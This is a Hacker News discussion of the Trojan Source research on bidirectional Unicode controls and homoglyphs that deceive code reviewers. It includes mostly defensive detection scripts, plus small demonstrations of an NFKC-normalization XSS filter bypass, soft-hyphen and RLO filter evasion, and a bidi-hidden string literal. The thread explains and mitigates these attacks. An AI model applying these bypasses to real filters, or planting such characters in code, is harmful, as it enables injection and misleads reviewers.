       | Then build/commit/test hooks could be used to enforce that source
       | code files are indeed 100% ASCII.
       | 
       | I know, I know... Some are going to lament they don't have their
       | shiny Unicode symbols right in their source file. But... It looks
       | like you get what you pay for.
       | 
       | Bruce Schneier wrote it when Unicode came out btw: _"Unicode is
       | too complex to ever be secure"_.
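       | 
       | A minimal sketch of the kind of check such a hook could run,
       | assuming source files are read as text. The function name
       | find_non_ascii is made up for illustration, and wiring it into
       | an actual build/commit hook is left out:

```python
def find_non_ascii(text):
    """Return (line_number, column, code_point) for every non-ASCII character."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ord(ch) > 0x7F:
                hits.append((line_no, col, f"U+{ord(ch):04X}"))
    return hits


# Hypothetical input: the "e" in "user" is Cyrillic U+0435, not ASCII.
sample = 'if access_level != "us\u0435r" {  // Check if admin\n'
print(find_non_ascii(sample))
```

       | A hook would fail the commit whenever the returned list is not
       | empty for a file that is supposed to be pure ASCII.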
        
         | EamonnMR wrote:
         | Having readable unicode in string literals is nice.
        
         | thereddaikon wrote:
         | Seems the bigger complaint isn't the lack of fancy unicode in
         | comments; it's that non-English speakers with non-Latin
         | alphabets won't be able to comment in their native language.
         | 
         | I'll leave it up to others to discuss how important this is or
         | isn't.
        
         | Jeff_Brown wrote:
         | > Bruce Schneier wrote it when Unicode came out btw: "Unicode
         | is too complex to ever be secure".
         | 
         | It's astounding to me that there's room for such complexity in
         | it. I thought it was just a lot of symbols. What other rules
         | does Unicode have besides changing the order sometimes?
        
           | ncc-erik wrote:
           | The one a lot of folks know about was the soft hyphen
           | (U+00AD) to bypass swear filters. I was able to use
           | normalization to create XSS attacks.
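           | 
           | A sketch of how both tricks can work in general (an assumed
           | shape, not the actual exploits; naive_filter is a made-up
           | stand-in for a real input filter). A soft hyphen splits a
           | word without showing up, and NFKC normalization turns
           | fullwidth brackets into ASCII ones after a filter has
           | already run:

```python
import unicodedata


def naive_filter(text):
    """Hypothetical filter: accept input only if it has no ASCII '<'."""
    return "<" not in text


# A soft hyphen (U+00AD) hides inside a word, so a substring check misses it.
hidden = "b\u00ADad"
print("bad" in hidden)

# Fullwidth '<' (U+FF1C) and '>' (U+FF1E) pass the filter untouched...
payload = "\uFF1Cscript\uFF1E"
print(naive_filter(payload))

# ...but compatibility normalization maps them to ASCII afterwards.
normalized = unicodedata.normalize("NFKC", payload)
print(normalized, naive_filter(normalized))
```

           | The usual fix is to normalize first and filter second, never
           | the other way round.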
        
         | supperburg wrote:
         | How dare you suggest something sensible. The mob will soon be
         | knocking at your door.
        
         | InfiniteRand wrote:
         | Might be nice to have an easy tool to scan files and whitelist
         | characters from specific alphabets, because in most
         | international teams I think you'll have a common language for
         | comments, and so I think it's unlikely that you'll need say
         | European and Indic and Chinese characters in one code base.
         | Except the one pain point I can see - @author annotations in
         | the source code, if you have an international team you might
         | end up with a variety of scripts in that field, in my mind
         | that's something that can be lived without, but I can imagine
         | some people being sensitive about that.
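         | 
         | A rough sketch of such a scanner. Python's standard library
         | has no script property, so this assumes the first word of the
         | Unicode character name ("LATIN", "CYRILLIC", "HEBREW", ...)
         | is a good enough stand-in for the alphabet. ALLOWED_SCRIPTS
         | and the function names are made up for illustration:

```python
import unicodedata

ALLOWED_SCRIPTS = {"LATIN"}  # hypothetical per-project allowlist


def script_of(ch):
    """Rough script guess: the first word of the Unicode character name."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def disallowed_letters(text, allowed=ALLOWED_SCRIPTS):
    """Return (index, char, script) for letters outside the allowed scripts."""
    return [
        (i, ch, script_of(ch))
        for i, ch in enumerate(text)
        if ch.isalpha() and script_of(ch) not in allowed
    ]


print(disallowed_letters("us\u0435r"))       # Cyrillic letter hiding in "user"
print(disallowed_letters("caf\u00e9 user"))  # accented Latin is still Latin
```

         | The @author pain point could be handled by passing a wider
         | allowlist for those lines only.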
        
         | dotancohen wrote:
         | Though I comment source in English, lots of people that I work
         | with comment in other languages. kvll `bryt, mymyn lshml
         | (Hebrew: "including Hebrew, right to left").
        
         | SavantIdiot wrote:
         | Wouldn't simply stripping comments before doing any other
         | processing solve the problem? I know there are plenty of
         | programs that sprinkle code into comments, from Emacs to
         | linters. Or is this obviously naive?
         | 
         | Seems to me that if you need to put code in the comments,
         | you've got a bigger problem. I know people like tab hints and
         | lint overrides, but maybe it is time to focus on separation of
         | concerns at a higher level?
        
         | sfgweilr4f wrote:
         | Give it a few years and unicode will probably be turing-
         | complete. For reasons... likely not good ones though.
        
           | wizzwizz4 wrote:
           | Unicode rendering already requires multiple finite state
           | machines.
        
         | btbuildem wrote:
         | That was my first thought -- run all your source through an
         | ASCII-only filter, the problem goes away.
        
           | iforgotpassword wrote:
           | For projects like the Linux kernel this should be absolutely
           | feasible. A few names in headers get mangled and lose their
           | accents but that should be acceptable. Other projects... Well
           | there's already a couple examples in this comment section why
           | it won't be that easy.
        
       | visarga wrote:
       | Why is it called a Trojan horse instead of a Greek horse?
        
         | panarky wrote:
         | Because the Greeks transferred ownership.
        
       | pitdicker wrote:
       | Security advisory for the Rust programming language (with a nice
       | explanation):
       | https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html
       | 
       | Rust 1.56.1 will be released later today.
       | 
       | > To assess the security of the ecosystem we analyzed all crate
       | versions ever published on crates.io (as of 2021-10-17), and only
       | 5 crates have the affected codepoints in their source code, with
       | none of the occurrences being malicious.
       | 
       | Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png
        
         | robin_reala wrote:
         | That's a really impressively written error message.
        
           | sodality2 wrote:
           | That's one of Rust's selling points. For all I've used the
           | rust compiler, not once have I ever not known what error it
           | was pointing out: its error messages are incredibly helpful.
           | Occasionally I am unsure _why_ it's an error, but I always
           | know what it's referring to and what I could do to fix it.
        
             | Timwi wrote:
             | I've had the same experience with C#. The error messages
             | always state exactly what's wrong and where in the code
             | it's wrong. Many of them (especially compiler _warnings_
             | intended to point out syntax that is almost certainly a
             | bug) also tell you how to fix it (e.g. "consider using
             | 'new' keyword if hiding was intended").
        
               | hermitdev wrote:
               | Personally, I don't know why the last one ("consider
               | using 'new' keyword if hiding was intended") isn't an
               | error by default in C#. Not overriding the base method
               | is almost always a mistake, and if it's not a mistake,
               | better to be explicit about it, anyways. My $.02...
        
         | joosters wrote:
         | Their advisory is well-written and explains the problem well.
         | The example code they use:
         | 
         |     if access_level != "user" { // Check if admin
         | 
         | opens up a whole can of worms though. You don't need cunning
         | invisible control codes to break that line, you could just
         | replace any of the letters in 'user' with a different, but
         | almost-identical looking unicode symbol and you'd still have an
         | exploit. Even better, this would be a completely deniable
         | attack ("oops, I must have accidentally pressed alt-R while
         | typing that letter" excuse) - whereas explaining away why you
         | checked in some magical RTL/LTR encodings and hacked up a
         | comment is impossible. Plus, it would render well in far more
         | apps, terminals, command line programs, etc etc
        
           | codesections wrote:
           | > you could just replace any of the letters in 'user' with a
           | different, but almost-identical looking unicode symbol and
           | you'd still have an exploit.
           | 
           | The post mentions that exploit (and Rust's already existing
           | defense) in the appendix.
           | 
           | Here are the details, as explained in a previous post:
           | 
           | > The compiler will warn about potentially confusing
           | situations involving different scripts. For example, using
           | identifiers that look very similar will result in a warning.
           | warning: identifier pair considered confusable between `s`
           | and `s`
           | 
           | https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html
        
             | joosters wrote:
             | _The compiler will warn about potentially confusing
             | situations involving different scripts. For example, using
             | identifiers that look very similar will result in a
             | warning._
             | 
             | Unfortunately, I've little experience of rust, so I don't
             | have experience of that warning. It would certainly help
             | catch a one-liner exploit, but wouldn't it be excessively
             | noisy for code written in non-english languages?
        
               | wongarsu wrote:
               | It only warns if there actually are two identifiers that
               | look similar. Even if it's not malicious it's still
               | confusing and is worth renaming.
               | 
               | But if you want to, turning off specific warnings for a
               | file or block of code is really simple in rust, just add
               | "#[allow(confusable_idents)]"
        
               | estebank wrote:
               | The Unicode homoglyph lint will only trigger if there are
               | multiple identifiers that can look the same, it's not a
               | blanket warning on anything that isn't ASCII. It's close
               | to what browsers do with domain names. And you can always
               | allow lints.
        
             | lol768 wrote:
             | Am I missing something here? The spacing around these
             | homoglyph is _almost always_ noticeably wider than it
             | should be such that I don't understand how you could ever
             | miss it in any half-decent code review.
             | if access_level != "user" { // Check if admin
             | if access_level != "user" { // Check if admin
             | 
             | Come on, that looks _obviously_ off.
        
               | nonameiguess wrote:
               | If you were really reviewing that code, Rust has
               | algebraic data types, and access level should be an Enum,
               | not a String.
               | 
               | But it's their example. The problem isn't with
               | homoglyphs, though. It's with bidi control characters,
               | which are invisible to a human but not to the compiler,
               | which is how generated code can end up semantically
               | different from source code, which is the actual problem
               | here. What you see in code review would be the first
               | line, even though that isn't actually what is in the
               | source, because an editor that is bidi-aware would show
               | it that way.
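               | 
               | A minimal sketch of a scanner that makes those
               | characters visible, assuming the nine embedding,
               | override and isolate controls (U+202A to U+202E and
               | U+2066 to U+2069) are the ones to look for. The sample
               | line is modeled on the advisory's example and the
               | function names are made up for illustration:

```python
BIDI_CONTROLS = {
    "\u202A": "LRE", "\u202B": "RLE", "\u202C": "PDF",
    "\u202D": "LRO", "\u202E": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def find_bidi_controls(source):
    """Return (line_number, column, abbreviation) for each bidi control found."""
    hits = []
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, BIDI_CONTROLS[ch]))
    return hits


def make_visible(source):
    """Replace each bidi control with a visible tag such as <RLO>."""
    return "".join(
        f"<{BIDI_CONTROLS[ch]}>" if ch in BIDI_CONTROLS else ch
        for ch in source
    )


# What the compiler actually receives: the "comment" sits inside the string.
line = 'if access_level != "user\u202E \u2066// Check if admin\u2069 \u2066" {'
print(find_bidi_controls(line))
print(make_visible(line))
```

               | With the controls spelled out, it is plain that the
               | string literal being compared is not just "user".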
        
               | steveklabnik wrote:
               | > But it's their example
               | 
               | It's the example that the researchers provided to us, to
               | be clear about it.
        
               | hug wrote:
               | I think that it is possible that you are missing a fairly
               | important point.
               | 
               | ... And that point is that none of the vowels in my
               | previous sentence are latin, I guess.
        
               | mkl wrote:
               | I think you missed some. I can't seem to paste your fake
               | "i"s back in, but here's what I see:
               | 
               |     $ xxd
               |     I think that it is possible that you are missing a fairly important point.
               |     00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
               |     00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s poss..bl.
               |     00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265  . th..t you ..re
               |     00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
               |     00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly important p
               |     00000050: 6f69 6e74 2e0a                           oint..
        
               | hug wrote:
               | Made you look. :)
               | 
               | I also skipped a bunch of the "I"s.
        
               | mkl wrote:
               | Yes. What browser did you use to make the comment? I
               | can't get all those characters to paste in.
        
               | hug wrote:
               | Firefox 93.0 on Windows 11. Characters copied & pasted
               | from charmap.exe
               | 
               | a: U+0430 "Cyrillic small letter a"
               | 
               | e: U+0435 "Cyrillic small letter e"
               | 
               | i: U+0456 "Cyrillic small letter Byelorussian-Ukrainian i"
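               | 
               | For anyone who wants to check a suspicious string
               | without charmap.exe, a small sketch using Python's
               | unicodedata module. The bytes are the first 14 from
               | the xxd dump earlier in this thread, and
               | describe_non_ascii is a made-up helper name:

```python
import unicodedata


def describe_non_ascii(text):
    """Return 'U+XXXX NAME' for each distinct non-ASCII character, in order."""
    seen = []
    for ch in text:
        if ord(ch) > 0x7F and ch not in seen:
            seen.append(ch)
    return [f"U+{ord(ch):04X} {unicodedata.name(ch, '<unnamed>')}" for ch in seen]


# "I th?nk th?t", rebuilt from the hex bytes and decoded as UTF-8.
text = bytes.fromhex("4920 7468 d196 6e6b 2074 68d0 b074").decode("utf-8")
for entry in describe_non_ascii(text):
    print(entry)
```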
        
             | est31 wrote:
             | > warning: identifier pair considered confusable
             | 
             | Note that the lint you mention is about _identifiers_,
             | while "user" is a literal. The lint does not fire for
             | literals. String literals have always supported non ascii
             | characters since 1.0.0, and there has never been a lint for
             | them, until now with the 1.56.1 release.
        
               | estebank wrote:
               | Also worth noting that the homoglyph attack _isn't_
               | linted for in literals or comments, only the bidi
               | codepoints are.
        
           | _3u10 wrote:
           | This stuff has always been there consider this code:
           | 
           | if (uid = NULL) { // Check if root
           | 
           | And if you're using clang: if ((uid = NULL)) { // Check if
           | root
           | 
           | I'd venture that this is far more dangerous than unicode in
           | strings...
           | 
           | or how about:
           | 
           | strcpy()
           | 
           | or #include anything with a #DEFINE
        
             | [deleted]
        
             | fstrthnscnd wrote:
             | > if (uid = NULL) { // Check if root
             | 
             | That's not the same class of error, since here a programmer
             | can _see_ the issue by simple inspection.
             | 
             | > or #include anything with a #DEFINE
             | 
             | This one perhaps is closer to the mark, although not based
             | on unicode.
        
               | _3u10 wrote:
               | To me it's the same class of error which is convincing
               | humans and other automated tests that your code is OK
               | when it isn't.
               | 
               | I dealt with a bug that only appeared in release builds,
               | and never in debug. The offending code looked roughly
               | like this:
               | 
               |     if (blah)
               |     #ifdef DEBUG
               |         baz();
               |     #endif
               |     bar();
               | 
               | The systemic problem was it was a project created by
               | interns, and they'd review each other's code. By the time
               | the bug got to me the interns had left and a Sr Dev had
               | spent a day looking for the bug. It took me an hour to
               | find it. In isolation it's easy to see but in the mess of
               | all the other code, you really have to look for these
               | things.
        
             | capitainenemo wrote:
             | Rust doesn't allow assignment in conditionals.
             | 
             | https://locka99.gitbooks.io/a-guide-to-porting-c-to-
             | rust/con...
        
               | _3u10 wrote:
               | It does, in fact the article you posted, shows you
               | exactly when rust allows assignment in conditionals.
               | 
               | As long as you're initializing a variable, it's allowed,
               | if you're not initializing you'll have to use a block
               | expression.
        
               | capitainenemo wrote:
               | Should have just used this sentence - which also directly
               | covers parent's case.
               | 
               | "Rust does not allow assignment within simple expressions
               | so they will fail to compile. This is done to prevent
               | subtle errors with = being used instead of ==."
               | 
               | Better?
        
           | ace112 wrote:
           | Ooh, or you could just put in the cyrillic 'a' and even have
           | it look like it's legit :)
        
       | smsm42 wrote:
       | > Cambridge research clearly shows that most compilers can be
       | tricked with Unicode into processing code in a different way than
       | a reader would expect it to be processed.
       | 
       | Unless I misunderstand the premise, this is not right. The
       | compiler is not "tricked" into doing anything different - it
       | interprets the code the same way as it always did. It's like
       | saying "rm" command "can be tricked into" deleting important
       | files. The rm tool doesn't know which files are important to you,
       | and the compiler doesn't - and shouldn't - know what you consider
       | to be "correct" code. It would correctly compile any code that is
       | syntactically correct - if there are strings inside that look
       | weird to you, it doesn't matter to the compiler.
       | 
       | The entity that can be "tricked" here is the reviewer of the code
       | - who, indeed, might probably be tricked into accepting code that
       | does something different than they'd think it does (though it'd
       | require a very clever attacker for the code to both do
       | something nefarious with Unicode and still look innocent and not
       | weird to the reviewer). Fortunately, this is quite easy to fix -
       | just don't accept any patches with source code that have any non-
       | ASCII outside small set of localization resources (proper code
       | would have localizable resources outside the code anyway, tbh)
       | and no Unicode would ever trick you.
        
         | __alexs wrote:
         | > Fortunately, this is quite easy to fix - just don't accept
         | any patches with source code that have any non-ASCII outside
         | small set of localization resources
         | 
         | There are plenty of projects out there written by people who
         | aren't English speakers who depend on the Unicode capabilities
         | of languages to write code that is actually readable to them.
         | Turning that off is far from a solution.
        
           | smsm42 wrote:
           | Can you give an example? I've never seen a project (outside
           | domains on APL, etc.) that seriously relied on any Unicode
           | capabilities in the code itself (again, I am not talking
           | about localized strings). My native language is not English,
           | I've worked with people all over Europe, China, India, Japan,
           | Israel, etc. - there are a lot of exciting i18n/l10n problems
           | but I have never seen much of what a compiler would need to
           | be concerned with.
        
           | ivanhoe wrote:
           | Does anyone actually do that in a production code?
           | 
           | I myself am not native English speaker and use unicode when
           | writing in my mother tongue, but in 20+ years of programming
           | I've never seen anyone using non-ascii chars in their
           | professionally written code? Of course, you use the language
           | in localization files, and perhaps in comments occasionally -
           | especially in TODO stuff that's not meant to be permanent -
           | but not in the actual code, like e.g. for a variable or
           | function names.
           | 
           | I'd actually consider it a bad idea, as it limits
           | significantly who can manage that code in the future.
        
             | fstrthnscnd wrote:
             | > Does anyone actually do that in a production code?
             | 
             | Would you accept teaching code as production code?
             | Specifically, if you were to teach programming to young non
             | English speakers, wouldn't you accept them to use words of
             | their native tongue for variables and such?
             | 
             | > I'd actually consider it a bad idea, as it limits
             | significantly who can manage that code in the future.
             | 
             | Wouldn't you say that solely using roman letters in code
             | would impose a similar limit? In countries where these
             | letters are seldom used (like for instance greek letters in
             | western countries), only those accustomed to them would be
             | able to handle code (as it has been the case until the last
             | decade perhaps).
        
             | Cthulhu_ wrote:
             | It's a very western / Anglosphere attitude, and I think you
             | underestimate how much code is produced in e.g. China and
             | Japan nowadays, with comments in their native language.
             | 
             | How would you name a FooBarWicket if you don't speak a word
             | of English?
             | 
             | I mean don't get me wrong, ideally everybody writes code in
             | perfect English and sticks to a set of ~50 ascii
             | characters, but it's not an ideal world and you have to
             | keep other languages and cultures in mind.
        
               | Aeolun wrote:
               | > How would you name a FooBarWicket if you don't speak a
               | word of English?
               | 
               | How would you learn how to make a FooBarWicket without
               | knowing a word of English? Any programming languages
               | control constructs are almost by definition English.
        
               | ivanhoe wrote:
               | Well, what you call an Anglosphere attitude is a reality
               | of learning in a majority of non-english speaking
               | countries: There's simply not enough resources for
               | learning in your own language.
               | 
               | China is huge so I can see how it could work for them,
               | but I still have to admit it's very hard for me to
               | imagine someone becoming say a competent web dev without
               | picking at least some basic English along the way, so
               | they can handle at least the documentation and stay in a
               | loop on new tech coming out all the time. It's not
               | anything new as a concept, nor I see it as damaging for
               | local cultures in any way - back in my University days
               | I've learned myself some Russian so that I could read
               | their physics and chemistry books which were excellent
               | and way cheaper and easier for me to get than those from
               | the West. One day I'll have no problem learning some
               | Chinese if (or more likely when?) they become the
               | referent source of knowledge.
        
               | __alexs wrote:
               | > China is huge so I can see how it could work for them,
               | but I still have to admit it's very hard for me to
               | imagine someone becoming say a competent web dev without
               | picking at least some basic English along the way,
               | 
               | Having worked with some large software teams in China my
               | experience was that most people could speak a bit of
               | English (but generally didn't want to) and were nowhere
               | near at the level needed to actually design and write
               | software in English.
               | 
               | If we forced them to do everything in English quality was
               | terrible and everything took ages, but if we let them
               | write in Mandarin things were much better.
        
               | notJim wrote:
               | > it's very hard for me to imagine someone becoming say a
               | competent web dev without picking at least some basic
               | English along the way, so they can handle at least the
               | documentation and stay in a loop on new tech coming out
               | all the time.
               | 
               | Why would they need to learn English to do those things?
               | I'm sure there are Chinese-language tech news sites, and
               | Chinese-language documentation.
        
               | jrochkind1 wrote:
               | Agreed, but I'm still curious (and don't know the answer)
               | how often someone actually needs to put a "Bidi override"
               | in a comment... if I were a language designer I'd be
               | tempted to just say they aren't allowed in comments or
               | identifiers or anywhere but string literals/data, and
               | have the compiler/interpreter just reject it.
               | 
               | (I have used a bidi override before myself, for non-
               | malicious purposes!)
        
               | amenod wrote:
               | I would argue that even if you decide that you are using
               | some other language and not English, there is only a
               | well-defined subset of Unicode characters that should
               | ever be allowed in the codebase. Bidi override control
               | characters are clearly not among them, whichever language
               | you choose.
        
               | chmod775 wrote:
               | > there is _only_ a well-defined subset of Unicode
               | characters that should _ever_ be allowed in the codebase
               | 
               | It's not even remotely well-defined, and probably never
               | will be. Also, as long as we keep adding to unicode, you
               | will need to keep your whitelist of code points updated.
               | 
               | You can however find _a_ well-defined subset of
               | characters that can be allowed.
               | 
               | In either case you'd be essentially excluding entire
               | languages.
        
               | amenod wrote:
               | You misunderstood my point:
               | 
               | >> There is only ... that _should_ ever be allowed...
               | 
               | What I am saying is that if someone decides to code in a
               | non-English language (which is completely reasonable) they
               | _should_ define a subset of unicode characters that is
               | acceptable. Additionally, the allowed characters should
               | not permit tricks like these.
               | 
               | As for excluding entire languages... well, yes. This is
               | already the case today. But OTOH it's not like
               | understanding what "if" means gives you any special
               | advantage in programming.
        
               | rbanffy wrote:
               | > Bidi override control characters are clearly not among
               | them, whichever language you choose.
               | 
               | Not sure how would you write a comment in an RTL human
               | language in the middle of LTR code without it. Lots of
               | people learn to write RTL languages well before writing
               | any code.
               | 
               | What compilers can do is to process those characters and
               | assign them semantic value that makes the code equivalent
               | to what is expected to be rendered.
               | 
               | Now, bidi overrides in identifier names is a nightmare
               | I'd prefer to avoid.
        
               | amenod wrote:
               | The same way as you write a comment in a LTR human
               | language in the middle of RTL code - you don't. You stick
               | to either LTR or RTL. This is code, not prose.
        
               | WalterBright wrote:
               | > Not sure how would you write a comment in an RTL human
               | language
               | 
               | Siht ekil.
        
               | jrochkind1 wrote:
               | You do not actually need the bidi override control
               | character to put a comment in an RTL language in the
               | middle of LTR code.
               | 
               | You only need it if you are doing this, and the default
               | Unicode algorithm for guessing LTR/RTL boundaries gets it
               | wrong, so you need to override with an explicit bidi
               | override control. I'm not even sure how feasible that is
               | to do in the editor/IDE environments that developers with
               | this use case might use.
               | 
               | I am genuinely curious how often these sorts of
               | situations come up in actual development.
               | 
               | > What compilers can do is to process those characters
               | and assign them semantic value that makes the code
               | equivalent to what is expected to be rendered.
               | 
               | I don't understand what you mean or how that's even
               | possible, for the kinds of attacks discussed in OP.
        
               | jrochkind1 wrote:
               | Btw here's proof. Here is ltr text and rtl `ibriyt text
               | `rby interspersed with no bidi override control
               | characters to be found.
               | 
               | Unicode can handle this, it has a heuristic algorithm for
               | it. Note how if you try to select the text character-by-
               | character, your selection does funny things at the rtl to
               | ltr boundaries, because the byte order doesn't match the
               | order on the screen. It really is handling the
               | directionality changes, with the letters entered in
               | "order" across changes, there is no funny entry or
               | ordering going on, this is plain old normal unicode
               | handling interspersed directionality changes just fine,
               | with no bidi overrides.
               | 
               | It just sometimes gets it wrong for the intent of the
               | author. Especially when there are characters at the
               | boundaries that are themselves not strongly associated as
               | rtl or ltr (like ordinary "western arabic numerals" or
               | punctuation). That's what the bidi override control char
               | is for.
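               | 
               | A minimal Python sketch of those character classes, using
               | the standard library's unicodedata.bidirectional(). The
               | helper name bidi_classes and the sample string are made
               | up for illustration; this only looks up each character's
               | class and does not run the bidi algorithm itself.

```python
import unicodedata


def bidi_classes(text):
    """Return (character, bidi class) pairs for each character in text."""
    return [(ch, unicodedata.bidirectional(ch)) for ch in text]


# "a" is strongly LTR and Hebrew alef (U+05D0) is strongly RTL. The digit is
# a weak type and the punctuation and space are neutral or separator types,
# so their displayed direction depends on the surrounding characters.
sample = "a\u05d01,! "
for ch, cls in bidi_classes(sample):
    print(f"U+{ord(ch):04X} {cls}")
```

               | Characters whose class is not L, R or AL are the ones
               | the heuristic has to guess about at a boundary.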
        
               | dmz73 wrote:
               | When you code for yourself, write what you want. If you
               | write to collaborate then use English/ASCII. Imagine
               | international aviation if they allowed the same BS that
               | people in IT allow and now even try to promote - everyone
               | talking their own language and not understanding each
               | other - we would have planes colliding and crashing all
               | over the place.
        
               | Aeolun wrote:
               | We used to have that, with exactly the result you
               | describe. Which is why it was changed.
               | 
               | We'll get there eventually with software, but it
               | generally doesn't kill people so there's less incentive.
        
               | wizzwizz4 wrote:
               | Aviation requires real-time communication; it's not a
               | great analogy, I don't think.
        
               | worrycue wrote:
               | I still wonder though, just how much production non-
               | comment source code is not written in the ASCII character
               | set.
               | 
               | The libraries of most programming languages (developed in
               | the west) are in ASCII - frameworks and middleware too.
               | Have people in countries like Japan and China actually
               | translated all of that code - renaming functions,
               | classes, and variable names to their native tongue in
               | Unicode - or do they just learn the English names (they
               | are all nouns/pronouns and at most simple phrases so
               | translation should not be too difficult; they don't have
               | to understand English grammar).
        
               | Moru wrote:
               | Microsoft translated all the commands in Excel's
               | scripting language into local languages, making it
               | totally impossible for anyone to use. You can't even
               | google it because the help is so split up across
               | different languages.
        
               | Zababa wrote:
               | Not only the commands, the separator too. In some
               | languages, it's FUNCTION(arg1, arg2), in some others it's
               | FONCTION(arg1; arg2)
        
             | Bayart wrote:
             | I've definitely seen it done, in both code I was adjacent
             | to and code I was pulling from outside. I have vivid
             | memories of stumbling on a lib doing seemingly what I
             | needed but with all comments in Chinese and variables/funcs
             | in Pinyin.
        
             | Piskvorrr wrote:
             | I can attest that it happens, even in (natural) languages
             | that use Latin scripts. Sure, "just use en.US-ASCII" is a
             | mitigation, and most (Euroamerican) code follows this; the
             | bug extends to string literals however ("they don't end
             | where you see them // this is actually not part of the
             | string; return;"), so a different approach is needed.
        
             | Const-me wrote:
             | Professionally made GUI software needs Unicode even when
             | English localized, for typography.
             | 
             | Proper quotes, proper dashes (ASCII doesn't have a dash
             | character, it only has minus), non-breakable space, soft
             | hyphen, € character, Greek letters like π and μ, etc.
        
               | jdavis703 wrote:
               | Most of these should be in a separate file for i18n, not
               | directly in the source code.
        
               | Const-me wrote:
               | Internationalization is not limited to putting strings
               | into a table in resource. It also needs non-trivial
               | amount of code. Printing numbers into strings is code not
               | data. Yet if you want the numbers to look good, like "600
               | μm" or "6×10⁻⁴ meters", you gonna have Unicode in code,
               | not the resources.
               | 
               | Another thing, not every software needs i18n. Depends on
               | the market. I'm yet to see a C++ compiler which would
               | localize their output messages.
        
               | jdavis703 wrote:
               | "Meters" is an English word, and a string like "600 μm"
               | should still probably be extracted from the code as "%d
               | μm."
        
               | Const-me wrote:
               | Still, there are also strings like "6⋅10⁻⁴"
        
               | kzrdude wrote:
               | GCC supports localization, that's one C++ compiler.
               | 
               | Intel C++ compiler seems to have a Japanese version (not
               | tried).
        
         | [deleted]
        
         | klohto wrote:
         | You argue away your own fix. The proposed fix is like
         | limiting rm to files outside of /sys; plenty of projects
         | depend on the standardized behavior.
        
         | Sebb767 wrote:
         | > The rm tool doesn't know which files are important to you,
         | and the compiler doesn't - and shouldn't - know what you
         | consider to be "correct" code.
         | 
         | This is actually no longer true. Many rm implementations today
         | prevent you from deleting a path including the root directory,
         | unless you explicitly specify `--no-preserve-root`. Similarly,
         | a lot of compilers tend to warn you or outright stop if they
         | detect code that is very likely to be buggy - the rust compiler
         | warning about these control characters is just the latest
         | example.
         | 
         | Of course, in theory, each tool should do its job and the user
         | should be the boundary to know what's right. In practice,
         | though, these heuristics tend to catch bugs-to-be 95% of the
         | time (at least in my experience) and are easily disabled
         | otherwise, so they are good to have.
        
           | wizzwizz4 wrote:
           | I couldn't care less about my root directory. The only things
           | I care about are the motherboard firmware and the /home
           | directory, and nothing prevents `rm` from deleting those.
           | 
           | The `--one-file-system` or `--preserve-root=all` flags are
           | more useful than `--preserve-root`, but they're not defaults.
           | (For a good reason: compatibility.)
        
         | robin_reala wrote:
         | APL developers would disagree.
        
       | edent wrote:
       | BDI can be used to evade profanity filters. Writing something
       | like `‮kcuf` will display a banned word.
       | 
       | Does it work here?
       | 
       | > I am an toidi
       | 
       | No? HN strips the BDI.
       | 
       | But there are plenty of other systems which display weird RTL
       | behavior.
        
         | lokedhs wrote:
         | Yes, Mastodon has recently been discussing this.
         | https://github.com/mastodon/mastodon/issues/2777
        
       | im3w1l wrote:
       | I remember bringing this up many years ago. Yes specifically
       | making code seem like comments using bidi. I'm just a little bit
       | salty I won't get the credit.
       | 
       | https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146
        
       | ComodoHacker wrote:
       | The paper: https://www.trojansource.codes/trojan-source.pdf
        
       | robotmay wrote:
       | This was a pretty interesting thing to mitigate - we added some
       | support around it to GitLab after it was reported to us, which
       | shipped in the latest security release:
       | https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
       | (you can actually see it in effect on that commit's examples,
       | which is quite meta). These characters have valid use-cases in
       | right-to-left languages like Arabic, Japanese etc, so it had to
       | be configurable for project-owners if they have legitimate use-
       | cases for it. Our focus was on making sure that repository
       | maintainers could see these characters in code reviews.
       | 
       | The homoglyph attack is interesting but it really should be
       | noticed as part of a code review process, as it requires adding
       | the imitation function calls at some point too. It'd also likely
       | be pretty frustrating to end users if we were to highlight every
       | single unicode character that looks like the latin alphabet.
       | 
       | It's certainly a good lesson in not copy/pasting random snippets
       | from the internet and pasting them into a root shell, however :D
       | (we do always highlight the bidi characters on GitLab snippets,
       | though)
       | 
       | Aside: this was a royal pain in the arse to figure out if I had
       | live examples in the specs, because vim also just rendered them
       | "correctly". I ended up checking the files in Windows Notepad on
       | another machine to sanity check them.
       | 
       | Thanks to the authors for responsible disclosure.
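       | 
       | For anyone who wants a rough local check, here is a minimal
       | Python sketch of flagging individual bidi control characters.
       | It is not GitLab's implementation; the names BIDI_CONTROLS and
       | find_bidi_controls and the sample snippet are made up for
       | illustration.

```python
# Explicit bidi embedding, override and isolate controls, keyed by code point.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def find_bidi_controls(source):
    """Yield (line number, column, abbreviation) for each bidi control."""
    for lineno, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                yield lineno, col, BIDI_CONTROLS[ch]


# Hypothetical input: a string literal that hides its real end.
snippet = 'ok = 1\nif level != "user\u202e \u2066// Check if admin\u2069 \u2066") {\n'
hits = list(find_bidi_controls(snippet))
for lineno, col, name in hits:
    print(f"line {lineno}, column {col}: {name}")
```

       | A check like this only reports where the characters are;
       | whether they are legitimate is still a call for the reviewer.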
        
         | charcircuit wrote:
         | >These characters have valid use-cases in right-to-left
         | languages like Arabic, Japanese etc,
         | 
         | I've never seen it used for Japanese. I don't think there is a
         | valid use case for Japanese.
